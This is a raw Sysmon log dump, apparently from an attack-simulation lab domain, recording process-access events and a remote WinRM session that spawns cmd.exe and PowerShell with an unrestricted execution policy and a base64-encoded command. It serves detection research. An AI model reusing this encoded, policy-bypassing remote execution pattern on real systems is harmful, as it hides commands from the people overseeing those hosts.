10341000x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16D5-5F84-7900-000000007F01}47964800C:\Windows\system32\cmd.exe{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.758{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D5-5F84-78B9-040000000000}0x4b9780HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-16D5-5F84-7900-000000007F01}4796C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16D5-5F84-7800-000000007F01}47324752C:\Windows\system32\conhost.exe{5D479F2C-16D5-5F84-7900-000000007F01}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16D5-5F84-7900-000000007F01}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16D5-5F84-7700-000000007F01}47204776C:\Windows\system32\WinrsHost.exe{5D479F2C-16D5-5F84-7900-000000007F01}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.753{5D479F2C-16D5-5F84-7900-000000007F01}4796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D5-5F84-78B9-040000000000}0x4b9780HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16D5-5F84-7700-000000007F01}4720C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-1400-000000007F01}13081548C:\Windows\system32\svchost.exe{5D479F2C-16D5-5F84-7700-000000007F01}4720C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16D5-5F84-7700-000000007F01}4720C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 